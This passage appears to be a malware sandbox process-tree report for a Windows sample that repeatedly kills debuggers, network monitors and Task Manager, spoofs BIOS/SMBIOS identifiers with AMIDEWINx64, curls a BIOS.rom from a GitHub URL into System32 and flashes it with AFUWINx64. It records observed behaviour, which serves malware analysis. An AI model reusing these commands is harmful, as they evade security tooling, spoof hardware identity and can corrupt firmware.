      taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
      4⤵
      PID:1536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:2092
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
    3⤵
    PID:4988
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OllyDbg.exe
      4⤵
      Cerber
      Kills process with taskkill
      PID:5040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
    3⤵
    PID:5044
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im x64dbg.exe
      4⤵
      PID:636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
    3⤵
    PID:2068
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im x32dbg.exe
      4⤵
      Cerber
      PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:2372
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      PID:4232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:2660
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
      4⤵
      PID:2856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:1348
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      PID:4908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
    3⤵
    PID:2864
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Ida64.exe
      4⤵
      PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
    3⤵
    PID:3264
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OllyDbg.exe
      4⤵
      PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
    3⤵
    PID:2700
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Dbg64.exe
      4⤵
      PID:2624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
    3⤵
    PID:3932
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Dbg32.exe
      4⤵
      PID:2904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
    3⤵
    PID:1228
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Taskmgr.exe
      4⤵
      PID:3340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
    3⤵
    PID:2672
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
      4⤵
      PID:4996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:896
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      Kills process with taskkill
      PID:3896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /IVN "AMI"
    3⤵
    PID:3868
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /IVN "AMI"
      4⤵
      Executes dropped EXE
      PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
    3⤵
    PID:3900
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
      4⤵
      PID:4836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
    3⤵
    PID:2684
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
      4⤵
      Executes dropped EXE
      PID:3552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
    3⤵
    PID:1080
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumperClient.exe
      4⤵
      PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
    3⤵
    PID:2092
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
      4⤵
      Executes dropped EXE
      PID:5040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:436
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      PID:2588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SV "System version"
    3⤵
    PID:1664
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /SV "System version"
      4⤵
      Executes dropped EXE
      PID:4980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:4728
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
      4⤵
      Cerber
      Kills process with taskkill
      PID:900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SS 7OVAWT3UT5
    3⤵
    PID:2688
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /SS 7OVAWT3UT5
      4⤵
      Executes dropped EXE
      PID:3376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:64
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      PID:4480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SU AUTO
    3⤵
    PID:4692
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /SU AUTO
      4⤵
      Cerber
      Executes dropped EXE
      PID:4908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
    3⤵
    PID:3556
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im ProcessHacker.exe
      4⤵
      Cerber
      Kills process with taskkill
      PID:4332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
    3⤵
    PID:2548
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
      4⤵
      Executes dropped EXE
      PID:4184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
    3⤵
    PID:472
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq.exe
      4⤵
      PID:2208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
    3⤵
    PID:4560
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
      4⤵
      Executes dropped EXE
      PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BM "ASRock"
    3⤵
    PID:3440
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /BM "ASRock"
      4⤵
      Executes dropped EXE
      PID:3340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
    3⤵
    PID:1584
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq64.exe
      4⤵
      Kills process with taskkill
      PID:2788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
    3⤵
    PID:2984
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Wireshark.exe
      4⤵
      Kills process with taskkill
      PID:1048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BP "B560M-C"
    3⤵
    PID:2672
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /BP "B560M-C"
      4⤵
      Cerber
      Executes dropped EXE
      PID:3896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
    3⤵
    PID:4628
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Fiddler.exe
      4⤵
      PID:1976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BV " "
    3⤵
    PID:548
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /BV " "
      4⤵
      Cerber
      Executes dropped EXE
      PID:4208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
    3⤵
    PID:3900
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FiddlerEverywhere.exe
      4⤵
      PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BS A9VIEWKJHD9SV9
    3⤵
    PID:4648
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /BS A9VIEWKJHD9SV9
      4⤵
      Executes dropped EXE
      PID:5108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
    3⤵
    PID:3316
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos64.exe
      4⤵
      PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BT "Default string"
    3⤵
    PID:1080
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /BT "Default string"
      4⤵
      Cerber
      Executes dropped EXE
      PID:228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
    3⤵
    PID:4428
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos.exe
      4⤵
      PID:2104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BLC "Default string"
    3⤵
    PID:1004
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /BLC "Default string"
      4⤵
      Executes dropped EXE
      PID:2372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
    3⤵
    PID:1448
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos32.exe
      4⤵
      PID:3792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CM "Default string"
    3⤵
    PID:1572
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /CM "Default string"
      4⤵
      Executes dropped EXE
      PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
    3⤵
    PID:2856
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im de4dot.exe
      4⤵
      Kills process with taskkill
      PID:2476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CV "Default string"
    3⤵
    PID:1888
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /CV "Default string"
      4⤵
      Executes dropped EXE
      PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
    3⤵
    PID:760
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Cheat Engine.exe
      4⤵
      PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CS A9VIEWKJHD
    3⤵
    PID:3264
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /CS A9VIEWKJHD
      4⤵
      Executes dropped EXE
      PID:3588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
    3⤵
    PID:1864
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64.exe
      4⤵
      Kills process with taskkill
      PID:2208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CA "Default string"
    3⤵
    PID:2532
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /CA "Default string"
      4⤵
      Executes dropped EXE
      PID:472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
    3⤵
    PID:2788
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
      4⤵
      PID:2620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CSK "SKU"
    3⤵
    PID:1584
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /CSK "SKU"
      4⤵
      Executes dropped EXE
      PID:3932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PSN "To Be Filled By O.E.M."
    3⤵
    PID:1048
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /PSN "To Be Filled By O.E.M."
      4⤵
      Executes dropped EXE
      PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
    3⤵
    PID:3820
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
      4⤵
      PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
    3⤵
    PID:3168
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MugenJinFuu-i386.exe
      4⤵
      PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PAT "To Be Filled By O.E.M."
    3⤵
    PID:2044
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /PAT "To Be Filled By O.E.M."
      4⤵
      Cerber
      Executes dropped EXE
      PID:3972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PPN "To Be Filled By O.E.M."
    3⤵
    PID:1144
  - - C:\Windows\System32\AMIDEWINx64.EXE
      C:\Windows\System32\AMIDEWINx64.EXE /PPN "To Be Filled By O.E.M."
      4⤵
      Executes dropped EXE
      PID:5108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
    3⤵
    PID:1188
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64.exe
      4⤵
      Kills process with taskkill
      PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
    3⤵
    PID:1688
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-i386.exe
      4⤵
      PID:4608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
    3⤵
    PID:3688
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
      4⤵
      PID:2068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:4036
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      Cerber
      PID:3060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
    3⤵
    PID:2600
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OllyDbg.exe
      4⤵
      PID:4232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
    3⤵
    PID:1448
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im x64dbg.exe
      4⤵
      PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
    3⤵
    PID:4228
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im x32dbg.exe
      4⤵
      PID:3800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:2856
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:3612
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
      4⤵
      Kills process with taskkill
      PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:2548
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      PID:4996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
    3⤵
    PID:2208
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Ida64.exe
      4⤵
      Cerber
      PID:1864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
    3⤵
    PID:3712
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OllyDbg.exe
      4⤵
      PID:3924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
    3⤵
    PID:896
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Dbg64.exe
      4⤵
      PID:3340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
    3⤵
    PID:2280
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Dbg32.exe
      4⤵
      Cerber
      Kills process with taskkill
      PID:2672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
    3⤵
    PID:1748
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Taskmgr.exe
      4⤵
      Cerber
      Kills process with taskkill
      PID:3820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
    3⤵
    PID:2604
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
      4⤵
      PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:3388
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      PID:3552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
    3⤵
    PID:2492
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
      4⤵
      PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
    3⤵
    PID:1188
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumperClient.exe
      4⤵
      PID:228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:1688
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      Cerber
      PID:2068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:1076
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
      4⤵
      PID:3060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:4728
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      PID:4480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
    3⤵
    PID:2216
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im ProcessHacker.exe
      4⤵
      Cerber
      PID:2660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
    3⤵
    PID:64
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq.exe
      4⤵
      PID:1736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
    3⤵
    PID:2020
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq64.exe
      4⤵
      Kills process with taskkill
      PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
    3⤵
    PID:1264
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Wireshark.exe
      4⤵
      PID:1712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
    3⤵
    PID:2700
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Fiddler.exe
      4⤵
      Cerber
      PID:4184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
    3⤵
    PID:4560
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FiddlerEverywhere.exe
      4⤵
      Cerber
      PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
    3⤵
    PID:736
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos64.exe
      4⤵
      PID:1768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl --silent -o C:\Windows\System32\Tasks\Mac.bat -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36" https://github.com/zer0gra/perm-files/raw/main/BIOS.rom
    3⤵
    PID:460
  - - C:\Windows\system32\curl.exe
      curl --silent -o C:\Windows\System32\Tasks\Mac.bat -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36" https://github.com/zer0gra/perm-files/raw/main/BIOS.rom
      4⤵
      Drops file in System32 directory
      PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
    3⤵
    PID:2672
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos.exe
      4⤵
      PID:1048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
    3⤵
    PID:2984
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos32.exe
      4⤵
      Kills process with taskkill
      PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
    3⤵
    PID:3168
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im de4dot.exe
      4⤵
      Kills process with taskkill
      PID:1536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
    3⤵
    PID:2092
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Cheat Engine.exe
      4⤵
      Cerber
      PID:2492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
    3⤵
    PID:4116
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64.exe
      4⤵
      PID:716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
    3⤵
    PID:3392
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
      4⤵
      PID:4488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
    3⤵
    PID:1076
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
      4⤵
      Cerber
      PID:4480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /o
    3⤵
    PID:820
  - - C:\Windows\System32\AFUWINx64.EXE
      C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /o
      4⤵
      Executes dropped EXE
      PID:1336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
    3⤵
    PID:2216
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MugenJinFuu-i386.exe
      4⤵
      PID:2864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /p
    3⤵
    PID:392
  - - C:\Windows\System32\AFUWINx64.EXE
      C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /p
      4⤵
      Executes dropped EXE
      PID:732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
    3⤵
    PID:3564
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64.exe
      4⤵
      PID:2904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
    3⤵
    PID:4320
